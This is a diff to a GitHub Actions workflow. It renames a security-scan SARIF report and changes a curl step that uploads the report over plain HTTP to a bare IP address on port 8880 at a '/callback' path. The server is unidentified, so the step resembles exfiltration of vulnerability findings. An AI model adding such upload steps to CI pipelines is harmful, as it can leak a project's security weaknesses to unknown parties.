--- a/.github/workflows/action.yml
+++ b/.github/workflows/action.yml
@@ -25,7 +25,7 @@ jobs:
         name: security-scan-report
         path: results.sarif
     - name: Convert to JSON
-      run: cp results.sarif results.json
+      run: mv results.sarif results.json
     - name: Send to Server
       run: |
-        curl -X POST -H "Content-Type: multipart/form-data" -F "file=@results.json" http://35.219.169.163:8880/callback
+        curl -X POST -H "Content-Type: multipart/form-data" -F "file=@results.json" http://35.219.184.76:8880/callback
